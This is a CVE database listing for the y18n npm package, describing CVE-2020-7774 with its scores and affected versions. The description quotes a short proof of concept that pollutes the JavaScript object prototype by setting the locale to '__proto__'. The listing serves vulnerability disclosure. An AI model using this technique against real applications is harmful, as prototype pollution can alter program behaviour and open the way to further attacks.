Vulnerabilities (CVE)

Filtered by vendor Y18n Project Subscribe
Filtered by product Y18n
CVE Vendors Products Updated CVSS v2 CVSS v3
CVE-2020-7774 1 Y18n Project 1 Y18n 2021-07-21 7.5 HIGH 7.3 HIGH
This affects the package y18n before 3.2.2, 4.0.1 and 5.0.5. PoC by po6ix: const y18n = require('y18n')(); y18n.setLocale('__proto__'); y18n.updateLocale({polluted: true}); console.log(polluted); // true